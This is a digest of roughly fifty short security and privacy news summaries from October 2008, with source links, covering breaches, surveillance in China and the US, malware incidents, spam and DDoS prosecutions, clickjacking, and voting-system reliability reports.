1. DHS to Proceed With Spy-Satellite Surveillance Program Despite Privacy Concerns (October 1, 2008) The US Department of Homeland Security (DHS) plans to go ahead with the first phase of a satellite surveillance program called the National Applications Office (NAO) despite concerns that NAO may not comply with privacy laws. Through NAO, US government officials at the federal, state and local levels gain access to data gathered by spy satellites to help them with emergency response and domestic security issues. A recent report from the Government Accountability Office (GAO) says that there is no "assurance that NAO operations will comply with applicable laws and privacy and civil liberties standards.“ http://online.wsj.com/article/SB122282336428992785.html?mod=googlenews_wsj

2. Malicious Code Detected on South Korean Military Contractor Systems (October 1, 2008) Malicious code has been detected on the computer systems of two companies that provide weapons and vessels to the South Korean military. LIGNex1, which manufactures guided missiles, discovered the code in March, 2008; Hyundai Heavy Industries, a naval vessel manufacturer, found the code last month. The National Security Research institute believes the people responsible for the code's presence likely used it to steal information. http://english.chosun.com/w21data/html/news/200809/200809290015.html http://www.scmagazineuk.com/South-Korean-defence-suppliers-uncover-malicious- code/article/118477/

3. Chinese Skype Users Under Surveillance (October 2 & 3, 2008) Researchers and human rights activists have uncovered a surveillance program in China that eavesdrops on the communications of Skype, which operates in China as Tom-Skype. The system looks for certain words and phrases that could indicate the conversations are addressing controversial political and social issues, including Falun Gong, democracy and powdered milk. The researchers discovered the surveillance system in September when one of the researchers noticed that each time he typed in a certain word, the message was sent to a certain Internet address. He found that the messages were bring stored on Tom Online computers. http://www.nytimes.com/2008/10/02/technology/internet/02skype.html?partner=rssnyt&e mc=rss&pagewanted=print http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116099&source=rss_topic17 http://www.vnunet.com/vnunet/news/2227440/chinese-government-spying-skype http://news.bbc.co.uk/2/hi/science/nature/7649761.stm

4. Denial-of-Service Vulnerability Found in TCP Stack (October 2, 2008) Swedish researchers have uncovered flaws in the TCP stack that could be exploited to create denial-of-service conditions. The attack can be carried out in less than five minutes and exploits the way resources are allocated after a successful three-way handshake. The problem was discovered while the researchers were testing a scanning tool. More information about the issue is expected to be presented at the T2'08 Information Security Conference later this month in Helsinki. http://www.securityfocus.com/brief/831 http://news.cnet.com/8301-1009_3-10056759-83.html?part=rss&subj=news&tag=2547- 1009_3-0-20 http://www.heise-online.co.uk/security/Speculation-surrounds-DoS-vulnerability-in-the- TCP-protocol--/news/111651

5. Remote Tracking Software Used to Find Alleged Laptop Thief (October 1 & 2, 2008) A White Plains, NY man used remote tracking software to identify the person who stole his laptop computer. Jose Caceres's computer was stolen when he left it on top of his car while carrying items into his home. His initial attempts at using remote tracking software to find the culprit yielded little more than the thief's fondness for pornography, but eventually the suspect typed in his name and address while registering on a website. Caceres was able to provide police with adequate information for them to arrest Gabriel Mejia, who has been charged with grand larceny. http://www.theregister.co.uk/2008/10/02/laptop_theft_suspect_busted/print.html http://www.cnn.com/2008/TECH/10/01/laptop.tracker.ap/index.html?eref=rss_tech

6. Proposed Legislation Would Restrict US Border Searches of Electronic Devices (October 2, 2008) US legislators have introduced a bill that would rein in the broad power that the Department of Homeland Security (DHS) has granted border control agents in seizing and searching travelers' laptops and other electronic devices. The Travelers' Privacy Protection Act would require that DHS establish reasonable suspicion of wrongdoing before searching US residents' devices; it would also require that DHS have probable cause and a court order or a warrant to hold a device for more than 24 hours. There would be restrictions placed on the sharing of information gathered through the searches and DHS would be required to report to Congress on its border searches. http://news.cnet.com/8301-13578_3-10055020-38.html http://www.securityfocus.com/brief/832

7. Estonia's Cyber Security Policy (October 3, 2008) A year-and-a-half after suffering coordinated denial-of-service attacks against its government and commercial computer systems, Estonia has released a national cyber security strategy that includes details about the attacks and offers recommendations for preventing attacks in the future and for a global stance toward cyber security. The report identifies four "policy fronts": "application of a graduated system of security measures in Estonia; development of Estonia's expertise in and high awareness of information security to the highest standard of excellence; development of an appropriate regulatory and legal framework to support the secure and seamless operability of information systems; [and] promoting international cooperation aimed at strengthening global cyber security.“ http://www.zdnetasia.com/news/security/0,39044215,62046785,00.htm http://www.mod.gov.ee/static/sisu/files/Estonian_Cyber_Security_Strategy.pdf

8. Skype Acknowledges Message Filtering and Retention in China (October 3 & 6, 2008) Skype has acknowledged that instant messages sent over its service in China were tapped, but points the finger at its local partner, TOM Online. Skype has a filter in place in China to block sensitive keywords, but only last week found out that the filter had been modified to log the conversations in which the keywords appear. The issue was discovered by Canadian researchers, who found the unsecured servers on which the messages were being stored. Skype has consulted with TOM on the matter and the security hole that allowed the researchers to read the stored messages has been closed. http://www.theregister.co.uk/2008/10/03/skype_coughs_to_china_test_tap/ http://www.heise-online.co.uk/security/Skype-admits-censorship-and-invasion-of- privacy-in-China--/news/111662s Supporting sites: http://www.greatfirewallofchina.org/http://www.greatfirewallofchina.org/ http://www.thedarkvisitor.com/2008/10/detailed-report-on-prcgov-monitoring-tom- skype/

9. 80,000+ Websites Serving Drive-by Malware Attacks (October 3, 2008) More than 80,000 websites have been "modified with malicious content“ that serves exploit code to unpatched PCs of site visitors. A server containing administrative login credentials for more than 200,000 websites has been found, although not all the sites are known to be infected with the malware. The infected sites include universities, Fortune 500 companies, government systems, and the US Postal Service. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116138&source=rss_news http://www.theregister.co.uk/2008/10/03/neosploit_powered_mass_hack_attack/

10. US Financial Crisis Ripe Pickings for Scammers (October 2, 2008) The mergers and acquisitions of banks resulting from the US financial crisis have provided new opportunities for online scam artists. Attacks have been seen in which the customers of a bank are asked to provide account information and other personal details to the bank's new owner for verification purposes. Banks would not ask for such information online; it would be done through paper mail. http://news.cnet.com/8301-1009_3-10057180-83.html?part=rss&subj=news&tag=2547- 1009_3-0-20s

11. T-Mobile Acknowledges 2006 Loss of Customer Data (October 4 & 6, 2008) T-Mobile has acknowledged that a disk containing personally identifiable information of 17 million German customers was lost more than two years ago. T-Mobile is a subsidiary of Deutsche Telekom AG, which publicly acknowledged the data loss only after an article published in Der Spiegel indicated that the data were being offered for sale online. The data include names, addresses, email addresses and mobile phone numbers, but no bank account information. Those affected by the breach run the gamut from everyday citizens to politicians and celebrities. T-Mobile reported the loss to the state prosecutors as soon as it learned of the situation and started monitoring sites where such information might be offered for sale. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116338&source=rss_topic17 http://www.theregister.co.uk/2008/10/06/t_mobile_records_lost/ http://www.dw-world.de/dw/article/0,2144,3690132,00.html

12. Stolen Laptop Holds Irish Health Service Executive Employee Data (October 3, 2008) A laptop stolen in Dublin, Ireland on September 17 contains personally identifiable information of several thousand Health Service Executive (HSE) staff. The compromised data include names, salaries and staff numbers; the data were not encrypted. Just weeks ago, several HSE data storage devices, including a laptop, a Blackberry and a data disk, were stolen from a medical officer's home. After that theft, HSE committed to encrypt all digital media storage devices that contain personal and medical data within one month. http://www.scmagazineuk.com/Irish-HSE-hit-by-laptop-theft/article/118714/

13. Two Indicted in Botnet Attack Case (October 3 & 6, 2008) A US federal grand jury has indicted two European men suspected of being involved in distributed denial-of-service (DDoS) attacks against the websites of two US satellite television equipment retailers in 2003. Lee Graham Walker of England and Axel Gembe of Germany could each face up to 15 years in prison if they are convicted of the charges of conspiracy and intentionally damaging a computer system. Both are presently still at large. Two other men, Saad (also called Jay) Echouafni and Paul Ashley, were charged in 2004 with conspiracy for the same attack. Ashley served two years for his role in the attacks; Echouafni fled the country that same year and remains a fugitive. The new indictment alleges Echouafni told Ashley to block access to rival sites Rapid Satellite and Weaknees. http://news.bbc.co.uk/2/hi/technology/7654357.stm http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116204&source=rss_topic17 http://news.cnet.com/8301-1009_3-10058710-83.html?part=rss&subj=news&tag=2547- 1009_3-0-20s http://www.theregister.co.uk/2008/10/03/walker_gembe_ddos_attacks_indictment/print.ht ml

14. Reported Data Breaches in US on the Rise (October 6, 2008) According to statistics compiled by the Identity Theft Resource Center, there have been 516 reported consumer data breaches in the first nine months of 2008, exposing 30 million records; in 2007, the total number of reported breaches was 446. Extrapolated from the numbers so far this year, the total number of reported breaches in 2008 could top 680. Eighty percent of the breaches involved digital media; the remaining 20 percent involved data recorded on paper. Of the incidents this year, 36 percent occurred at businesses, 21 percent occurred at educational institutions, and 16 percent on military or federal government systems. Twenty percent of the reported braches were due to lost or stolen digital media storage devices, 17 percent were due to insider theft and 13 percent were exposed through hacking. http://voices.washingtonpost.com/securityfix/2008/10/516_data_breaches_in_2008_exp o.html

15. Most Hotel Internet Connections for Guests are Not Adequately Secured (October 3, 2008) A study from the Cornell University School of Hotel Administration found that most hotels do not take adequate security precautions on the Internet connections they provide for their customers. The study compiles data from 147 written survey responses and from visits to 46 hotels. Twenty percent of the hotel networks use simple hub topologies, making them unsecured networks. Most of the other hotel networks channel guest traffic through switches or routers, which are more secure than hubs, but still make users susceptible to man-in-the-middle attacks. The researchers recommend that the hotels set up Virtual Local Area Networks (VLANs) to best protect guests from Internet threats. http://www.gcn.com/online/vol1_no1/47290-1.html?topic=security http://www.hotelschool.cornell.edu/research/chr/pubs/reports/abstract-14928.html

16. Mifare Classic RFID Vulnerability Research Published (October 6, 2008) A research paper detailing a security vulnerability in the Mifare Classic RFID chip has been published. The research, which was conducted by Professor Bart Jacobs and his colleagues at Radboud University in Holland, was set to be published earlier this year, but NXP, the company that manufactures the Mifare Classic chip, sought an injunction to delay the paper's dissemination to allow customers time to make changes to their security systems. The chip is used in prepaid transportation system cards in London, Boston and Holland and is also used to restrict access to some buildings. http://news.bbc.co.uk/2/hi/programmes/click_online/7655292.stm http://www.theregister.co.uk/2008/10/06/mifare_hack_finally_published/

17. US Army Program Seeks Out Unauthorized Applications (October 7, 2008) The US Army Information Management Support Center has put software on 11,000 desktop computers that will detect unauthorized applications. Any ones discovered are reported to the Configuration Control Board, which also lets the user know what has occurred. In some cases, users have the opportunity to explain why the application is on the computer. If the application is deemed unnecessary, it can be removed remotely. http://www.networkworld.com/news/2008/100708-army-desktop- software.html?fsrc=netflash-rss

18. Clickjacking Proof-of-Concept Demos Posted (October 7, 8 & 9, 2008) More information about clickjacking vulnerabilities has been released. Two researchers had planned to talk about the attack technique several weeks ago, but decided to postpone the greater part of their talk to allow vendors time to address the flaws in their products. This week, proof-of-concept demonstrations of the attack technique were posted to the Internet. The most recent version of NoScript, the Firefox add-on, protects users from being tricked by clickjacking attacks. http://blogs.zdnet.com/security/?p=2005&tag=nl.e539 http://news.zdnet.co.uk/security/0,1000000189,39500483,00.htm http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116638&source=rss_topic17 http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116800 http://www.vnunet.com/vnunet/news/2227827/adobe-warns-clickjacking

19. Quantum Encryption-Protected Network Debuted at Conference (October 9, 2008) Scientists at the SECOQC conference in Vienna, Austria demonstrated the first computer network protected by quantum key distribution. The six nodes of the network are connected by fiber optic cables. The essence of quantum key distribution relies on the Heisenberg Uncertainty Principle, which says that quantum information cannot be measured without disturbing it; therefore, if someone were to eavesdrop on communication protected by quantum encryption, the key would be altered, alerting the recipient that the communication had been intercepted. http://news.bbc.co.uk/2/hi/science/nature/7661311.stm

20. Man Admits Role in Phishing Scheme (October 7 & 9, 2008) Sergiu Daniel Popa of Romania has admitted that he was part of a phishing scheme that stole US $700,000 over a three-year period. He pleaded guilty to possession of unauthorized access devices and aggravated identity theft. Popa lived in the US for nearly seven years; he was extradited from Spain in June to face the charges. Popa faces up to 10 years in prison and a US $500,000 fine. According to his plea agreement, Popa stole identities of more than 7,000 people. http://www.theregister.co.uk/2008/10/09/romanian_phishing_guilty_plea/ http://www.startribune.com/local/30566739.html?elr=KArksLckD8EQDUoaEyqyP4O:DW 3ckUiD3aPc:_Yyc:aU7EaDiaMDCiUT

21. Alleged Palin eMail Hacker Indicted (October 8 & 9, 2008) A federal grand jury has indicted Tennessee college student David Kernell on one count of accessing a computer without authorization for allegedly breaking into Alaska Governor Sarah Palin's Yahoo! email account. Kernell has pleaded not guilty; if he is convicted, he could face up to five years in prison and a US $250,000 fine. The attacker used the password reset feature to gain access to Governor Palin's account and posted several of the email messages online. Information from a proxy service used by the attacker linked the suspicious activity to Kernell through an IP address. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116606&source=rss_topic17 http://news.bbc.co.uk/2/hi/americas/7661117.stm http://knoxville.fbi.gov/dojpressrel/2008/kxhacking100808.htm

22. Temporary Drop in Spam Volume Linked to Atrivo Going Offline (October 9, 2008) According to a report from Message Labs, when upstream providers cut off service to California-based Internet service provider (ISP) Atrivo, the amount of detected spam and botnet activity dropped significantly for several days. Atrivo was notorious for providing service to numerous scammers and cyber criminals. The decline will likely be short- lived as the scammers search out alternate providers, but the temporary downward spike indicates that the charges leveled at Atrivo were on the mark. http://voices.washingtonpost.com/securityfix/2008/10/spam_volumes_plummet_after_atr.html?nav=rss_blog

23. Spammers Ordered to Pay US $236 Million (October 8, 2008) A US District Judge in Iowa has ordered Henry Perez and Suzanne Bartok of Arizona to pay US $236 million for sending millions of unsolicited commercial emails. Robert Kramer the owner of Iowa-based CIS Internet Services, sued Perez and Bartok, who ran a company called AMP Dollar Savings, for inundating his network with spam. Perez and Bartok used a program called "Bulk Mailing 4 Dummies" to send out messages that advertised home mortgage refinancing. http://www.theregister.co.uk/2008/10/08/mom_and_pop_spammer_judgement/

24. Asus Acknowledges That Malware Shipped on Eee Box Computers (October 9, 2008) Asus is warning its customers in Japan of malware on recently shipped Eee Box desktop computers running Windows. The virus resides on the D drive in a file called recycled.exe. When the D drive is opened, the virus starts copying itself onto the C drive and all connected USB media. Asus has not said how the malware came to be on the drive. The malware is old enough that it should be detected by most anti-virus programs. http://www.heise-online.co.uk/security/Asus-warns-of-a-virus-infection-in-shipping-Eee- Boxes--/news/111691 http://blogs.zdnet.com/security/?p=2016 http://www.vnunet.com/vnunet/news/2227855/asus-warns-infected-eee-box-pcs

25. Contractor Allegedly Accessed Shell Oil Employee Database (October 6, 7 & 8, 2008) Shell Oil has warned its employees that their personal information may have been compromised. An employee of a third-party contractor working on-site for Shell was escorted off the premises after it emerged that the individual had allegedly accessed a database containing personally identifiable information of most current and former Shell employees. Shell has noted that in four instances, employee's Social security numbers (SSNs) were used to file phony unemployment claims. Shell has terminated its contract with the third-party company. http://www.theregister.co.uk/2008/10/07/shell_oil_database_breach/ http://news.zdnet.co.uk/security/0,1000000189,39499984,00.htm http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomy Name=cybercrime_and_hacking&articleId=9116421&taxonomyId=82&intsrc=kc_top

26. Missing MOD Hard Disk Contains 1.5m Pieces of Personal Information (October 11, 2008) The UK's Ministry Of Defense has admitted to losing a portable hard drive which contained the personal details of up to 1.5 million pieces of information including details of over 100,000 active service personnel and 600,000 recruits. The missing disk was not encrypted. Of particular concern is the missing data include details on personnel who served in Northern Ireland and may be terrorist targets. The lost information includes details such as individuals' passport numbers, addresses, date of birth and in some cases banking details. The portable disk was being held by the main IT contractor for the MOD, EDS. EDS reported the drive missing after a priority report was carried out on October the 8th. Over the past four years over 658 laptops have gone missing from the MOS with 26 memory sticks containing sensitive information missing since January 2008. http://news.bbc.co.uk/2/hi/uk_news/7662604.stm http://www.theregister.co.uk/2008/10/10/mod_data_loss/

27. New Anti-Piracy Law Imposes Stronger Penalties (October 13, 2008) US President George W. Bush has signed into law the Prioritizing Resources and Organization for Intellectual Property Act (PRO-IP), which imposes more stringent penalties on people convicted of music and movie piracy. The bill creates an executive- level position, Intellectual Property Enforcement Coordinator, who will advise the White House on protecting both domestic and international IP. The law has the backing of the Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA) as well as of the US Chamber of Commerce. The US Justice Department opposed the creation of the IP czar, saying such a position would undermine its authority. http://uk.reuters.com/article/technologyNews/idUKTRE49C7EI20081013 http://news.cnet.com/8301-13578_3-10064527-38.html http://www.pcmag.com/article2/0,2817,2332432,00.asp

28. World Bank Servers Have Been Attacked a Half-Dozen Times in the Last Year (October 10 & 12, 2008) The World Bank Group's computer network has reportedly come under attack at least half a dozen times since the middle of 2007. At least 18 servers were compromised. A World Bank spokesperson said "that at no point in time was any sensitive information accessed." However, it is nearly impossible to determine whether data were stolen, and attackers are known to install malware that collects sensitive information and seeks out other vulnerable computers on the network. Internet Storm Center: http://isc.sans.org/diary.html?storyid=5161http://isc.sans.org/diary.html?storyid=5161 http://www.foxnews.com/story/0,2933,435681,00.html http://news.cnet.com/8301-1009_3-10063522-83.html?part=rss&subj=news&tag=2547- 1009_3-0-20 http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId= 9116933&source=rss_topic17 http://www.usatoday.com/money/industries/banking/2008-10-12-world-bank- hackers_N.htm?csp=34

29. Allegations of Wiretapping Improprieties at NSA Facility (October 10, 2008) Three former workers at the National Security Agency (NSA)'s wiretapping facility at Fort Gordon, Georgia between 2001 and 2007 have alleged that US spies listened to personal conversations of Americans living abroad and on occasion, shared the conversations they heard with each other. The employees say there was scant supervision and conflicting instructions regarding expectations. Senate intelligence committee Senator John D. Rockefeller IV (D-W.Va.) says his staff is gathering more information about the allegations and may hold hearings. http://www.washingtonpost.com/wp- dyn/content/article/2008/10/09/AR2008100902953_pf.html http://blog.wired.com/27bstroke6/2008/10/kinne.html

30. Bugged Chip-and-Pin Machines Stealing Payment Card Data (October 10 & 11, 2008) Crime syndicates with members in China and Pakistan have managed to place devices in chip-and-pin machines that steal payment card data. The devices were planted in the machines before they were sent from China to stores in England, Ireland, Denmark, Belgium and the Netherlands. The stolen information was sent over mobile phone networks to people in Pakistan who then used the cards to make fraudulent purchases and withdrawals. The simplest way of determining if a given machine has data stealing capabilities is to weigh it; the devices add several ounces to each of the machines. The attack has been going on for nine months; losses are estimated to be between US $50 million and US $100 million, but could ultimately be higher. http://www.telegraph.co.uk/news/newstopics/politics/lawandorder/3173346/Chip-and-pin- scam-has-netted-millions-from-British-shoppers.html http://online.wsj.com/article/SB122366999999723871.html

31. Counterfeit Cisco equipment (October 10, 2008) The FBI has also been investigating instances of counterfeit networking and computer gear having been sold to the Department of Defense. The threat posed by outsourced electronic parts is real.

32. Man Behind CastleCops DDoS Attack Draws Two-Year Sentence (October 8 & 13, 2008) Gregory King has been sentenced to two years in prison and ordered to pay more than US $69,000 in restitution for launching distributed denial-of-service (DDoS) attacks against the CastleCops and KillaNet technologies websites. The attacks took place in early 2007 and caused an estimated US $70,000 in damage. King admitted to the attacks in June. He had faced a maximum sentence of 20 years in prison and a fine of half-a-million dollars, but prosecutors agreed to a reduced sentence in exchange for guilty pleas to two felony counts of transmitting code to cause damage to protected computers. http://www.theregister.co.uk/2008/10/13/castlecops_attacker_sentenced/ http://www.centralvalleybusinesstimes.com/stories/001/?ID=10031

33. TIGTA Report Finds Lack of Management Control on Some Computer Systems (October 9, 2008) According to a report from the Treasury Inspector General for Tax Administration (TIGTA), three computer systems at the US Internal Revenue Service (IRS) Office of Research, Analysis and Statistics lack adequate access management controls. The IRS's security policies were found to be adequate, but enforcement needs improvement. The report found there to be insufficient guidance and compliance oversight of IRS security policies; in addition, no vulnerability scanning software had been deployed. Eleven percent of employees on the systems reviewed were permitted access without required authorization from managers; systems were not configured to disable inactive accounts. http://www.nextgov.com/nextgov/ng_20081009_3974.php http://www.treas.gov/tigta/auditreports/2008reports/200820176fr.pdf

34. Malware-Laden Spam Pretends to be Windows Security Update (October 11, 2008) New spam messages are spreading, purporting to contain "an experimental private version of an update for all Microsoft Windows OS users." While there is nothing new about malware spreading in the guise of security updates, the fact that these messages are arriving just as Microsoft is scheduled to release its October update makes it more likely that the attackers will have a greater level of success. The executable file attached to the message infects users' computers with malware. The spam offers several clues that it is not legitimate; the grammar is dodgy and the message claims that the update addresses versions of Windows that are no longer supported and for which patches would not therefore be issued. Microsoft never sends security updates as email attachments. http://www.vnunet.com/vnunet/news/2228041/malware-writers-spoof-patch

35. Proof-of-Concept Code Released for Windows Privilege Elevation Flaw (October 10, 2008) Proof-of-concept exploit code for a privilege elevation vulnerability in Windows XP, Vista, Server 2003 and Server 2008 has been published. The person who disclosed the flaw earlier this year has now published the exploit code because he feels that six months is long enough to have had time to create a fix for the problem. The flaw was first noted back in March, when Microsoft initially dismissed it as a "design flaw.“ The company later agreed that it was a bona fide security problem. It is not known if the flaw will be addressed in this month's Microsoft security update, which is scheduled to be released on Tuesday, October 14. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 116924&source=rss_topic17 http://www.microsoft.com/technet/security/advisory/951306.mspx

36. Stolen Laptop Holds Pension Data (October 10 & 13, 2008) Deloitte has acknowledged that a laptop stolen from an employee's bag contains personally identifiable information of more than 150,000 pension holders. The data include names, National insurance numbers and salaries, but not bank data or addresses. A notice from Deloitte says that the security measures implemented on the laptop include encryption. http://www.theregister.co.uk/2008/10/13/deloitte_data_loss_vodafone/ http://news.bbc.co.uk/2/hi/uk_news/7664274.stm

37. NRI Secure Technologies (Japan) Web Application Security Assessment Trend Analysis Report (October 2008) A security assessment survey of 169 websites conducted by Japan's leading cyber security consulting organization, NRI Secure Technologies, Ltd., during the 2007 fiscal year found that 41 percent of the sites had critical security flaws that could allow access to sensitive information. An additional 30 percent of the sites were found to have vulnerabilities that could lead to information leaks. The majority of vulnerabilities in websites were found to be due to "incomplete measures," in which security measures have been applied to some extent, but not broadly enough to prevent access to sensitive data. http://www.nri-secure.co.jp/news/2008/1010_report.html

38. Consumer Reports Online Security Guide (October 2008) This consumer education guide to making online experiences safe includes information about auction scams, spam, viruses, spyware, phishing, ID theft and a special section regarding keeping children safe online. There are also ratings for security suites and antiphishing toolbars, an interactive phishing quiz, and videos about cell phone spam, phishing and methods CR uses to test the security suites. http://www.consumerreports.org/cro/electronics-computers/resource-center/cyber- insecurity/cyber-insecurity-hub.htm

39. FBI Sting: DarkMarket Carder Forum Yields Big Criminal Roundup (October 14 & 16, 2008) Documents obtained by a German public radio station show that the DarkMarket carder forum was actually a US FBI sting operation. The site was used as a haven to buy and sell card information, other financial account data and devices used to make cloned cards. The site operated for nearly two years and helped gather intelligence that led to at least 56 arrests and prevented the loss of millions of dollars to fraud. The FBI ran the sting operation in cooperation with the UK's Serious Organized Crime Agency (SOCA) and authorities in Turkey and Germany. http://www.theregister.co.uk/2008/10/14/darkmarket_sting/ http://news.bbc.co.uk/2/hi/uk_news/7675191.stm http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName =security&articleId=9117361&taxonomyId=17&intsrc=kc_top

40. DHS Criticized Again Over Lack of Cyber Attack Preparedness (October 13, 2008) Chairman of the US House Homeland Security Committee Rep. Bennie Thompson (D- Miss.) says the US Department of Homeland Security (DHS) has not taken necessary steps to prepare for major cyber attacks. DHS was to have completed eight planning scenarios and accompanying documents regarding preparation for different vectors of attack, including cyber attacks as the foundation of the National Response Framework. Rep. Thompson has asked DHS to submit a schedule for completion of the scenarios and associated documents by October 23. Just weeks ago, the DHS was criticized by the Commission of Cyber Security for the 44th Presidency regarding its lack of preparedness for fighting cyber attacks; the Commission recommended placing the locus of national cyber security somewhere else. DHS has refuted the Commission's allegations, saying that "a reorganization of roles and responsibilities is the worst thing that could be done to improve our nation's security posture against very real and increasingly sophisticated cyberthreats.“ http://www.fcw.com/online/news/154055-1.html http://news.cnet.com/8301-10787_3-10048033-60.html

41. State Data Encryption Laws Starting to Take Effect (October 16, 2008) A law that took effect this month in Nevada requires that all businesses encrypt electronically transmitted customer data. While Nevada's encryption law is the first to take effect, other states are starting to enact similar laws. A Massachusetts law that will take effect in January 2009 will require businesses that collect information about Massachusetts residents to encrypt sensitive data stored on laptops and other portable electronic devices. Businesses are subject to the state laws if they have customers or otherwise conduct business operations within those states. http://online.wsj.com/article/SB122411532152538495.html

42. Common Cause Report Says Some US States Need to Do More to Ensure Voting Accuracy (October 16, 2008) A study released by Common Cause warns that "On November 4, 2008, voting machines will fail somewhere in the United States in one or more jurisdictions in the country. Unfortunately, we don't know where. For this reason, it is imperative that every state prepare for system failure. [States are urged to] take steps necessary to insure that inevitable voting machine problems do not undermine either the individual right to vote or our ability to count each vote cast." The report examined laws, regulations and procedures regarding voting systems in four areas: provisions for machine repairs and availability of paper ballots; requirements for ballot accounting and vote reconciliation; use of a voter verifiable paper record; and post election audits of those verifiable paper records. Six states received high ratings in all categories; 10 states received low ratings in three of four categories. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId= 9117347&source=rss_topic17 http://www.brennancenter.org/content/resource/is_america_ready_to_vote

43. Fortify Report Examines Reliability of Voting Systems (October 15, 2008) A report from Fortify looks at the reliability of the various voting systems used in the US. Three of the six voting technologies - hand-counted ballots, optical scan ballots and absentee ballots - are fairly reliable; they are expected to be used for approximately 60 percent of ballots in the upcoming US general election. Two others - punch cards and lever machines - present some serious problems, but they are not widely used. Direct Recording Electronic voting systems, which are expected to be used for approximately 33 percent of ballots, are notoriously unreliable: they do not provide an easy way to verify individual votes, and they are easy to manipulate. http://blogs.usatoday.com/technologylive/2008/10/50-of-voting- sy.html?loc=interstitialskip http://www.betanews.com/newswire/pr/Fortify_Software_Releases_Voting_Guide_in_Ti me_for_November_Elections/145273

44. U.S. Intelligence Officials Increasingly Worried That Hackers Could Wreak Havoc On The Financial System (October 17, 2008) Today's National Journal, Shane Harris has a timely article illuminating examples of cyber security events that have caused significant problems for financial institutions, an dthe worries US intelligence officials are expressing. In closing, he quotes the Tom Kellerman, one of the first to shine a light on this problem, saying, "The reality is, we've been building our vaults out of wood in cyberspace for too long.“ http://www.shaneharris.net/2008/10/toxic-information.html

45. UK Ministry of Defence Now Says Lost Drive Holds Data on 1.7 Million People (October 14, 2008) The UK Ministry of Defence (MoD) has revised its estimate of the number of individuals affected by the loss of a hard drive from 100,000 to 1.7 million. Those who had made an initial inquiry about serving in the armed forces would have just their names and phone numbers on the drive, but those who had applied had provided information that includes next of kin and passport and national insurance numbers, driver's license information and banking data. The drive is believed to be unencrypted. http://www.theregister.co.uk/2008/10/14/mod_bigger_loss/ http://www.vnunet.com/vnunet/news/2228142/mod-loss-total-hit-million

46. FTC Takes Action Against Prolific Spammers (October 14 & 15, 2008) The US Federal Trade Commission (FTC) has taken action against two men described by Spamhaus.org CIO as "probably the most prolific spammers at the moment." The FTC has obtained a court order that shuts down six companies operated by Lance Atkinson and Jody Smith by prohibiting the pair from sending unsolicited commercial email messages and freezes assets associated with their companies. The FTC logged more than three million complaints about spam associated with Atkinson's and Smith's companies. The FTC is working with authorities in New Zealand, where Atkinson is a native, although he currently lives in Australia. http://www.theregister.co.uk/2008/10/14/prolific_spammers_targeted/ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9 117227&source=rss_topic17 http://www.cnn.com/2008/TECH/ptech/10/15/spam.ring.shutdown.ap/index.html?eref=rs s_tech http://www.nytimes.com/2008/10/15/technology/internet/15spam.html?_r=2&adxnnl=1&o ref=slogin&partner=rssnyt&emc=rss&adxnnlx=1224075611- bJVZsnBCB/SL580PciC+EQ&oref=slogin http://www.ftc.gov/opa/2008/10/herbalkings.shtm

47. Adobe Update Addresses Clickjacking Flaw (October 15 & 16, 2008) Adobe has issued an update for its Flash Player software to address the clickjacking vulnerability. Clickjacking is a term coined to describe a series of flaws that allow attackers to trick users into clicking on potentially malicious links. The update also addresses an interoperability problem between Flash Player and Firefox and the clipboard vulnerability. Users are encouraged to update Flash Player to version 10. http://www.theregister.co.uk/2008/10/16/adobe_update_thwarts_clickjacking/ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId= 9117268&source=rss_topic17 http://www.adobe.com/support/security/bulletins/apsb08-18.html

48. Police Buy Computer Tracking Service Licenses for Students and Other Residents (October 15, 2008) Police in Nottinghamshire, UK are paying for licenses for computer tracking and recovery software for people who live in high-crime areas. Last year, at least 665 laptop computers were stolen in Nottingham city. The software connects to a monitoring center once a day; the frequency changes to every 15 minutes if the machine is reported stolen. http://news.zdnet.co.uk/security/0,1000000189,39517297,00.htm http://www.scmagazineuk.com/ComputraceOne-used-by-Nottingham-police-to-reduce- laptop-theft/article/119491/

49. Court Says Pair Must Turn Over Encryption Keys (October 16, 2008) A British Court of Appeals has ruled that two men must divulge their encryption keys to law enforcement authorities. The men maintained that turning over the keys would be tantamount to self-incrimination and therefore a violation of their rights. The court said that the right not to incriminate oneself is not absolute; the password itself is not incriminating and the keys and the computers' contents exist as separate entities from the men. "In the eyes of the law, the information on the computers is already in the possession of the police." One of the men had been charged with offenses under the Terrorism Act for allegedly helping a third individual move to a new location, despite an order that required said individual to obtain permission from authorities before moving. Both men had received notices under the Regulation of Investigatory Powers Act (RIPA) ordering the keys' disclosure. http://www.out-law.com//default.aspx?page=9514

50. Mobile Phone Buyers in UK May Have to Provide Identification (October 19, 2008) People purchasing mobile phones in the UK could be required to provide a passport or other official identification under a government plan to create a database of all mobile phone owners. The plan is aimed at discovering the identities of people who buy prepaid mobile phones, which can be paid for with cash and no personal information is required. The office of UK Information Commissioner Richard Thomas says it is likely that the "compulsory mobile phone register" will be part of legislation introduced next year. Home Office officials have reportedly said the plan may be illegal. http://www.timesonline.co.uk/tol/news/politics/article4969312.ece

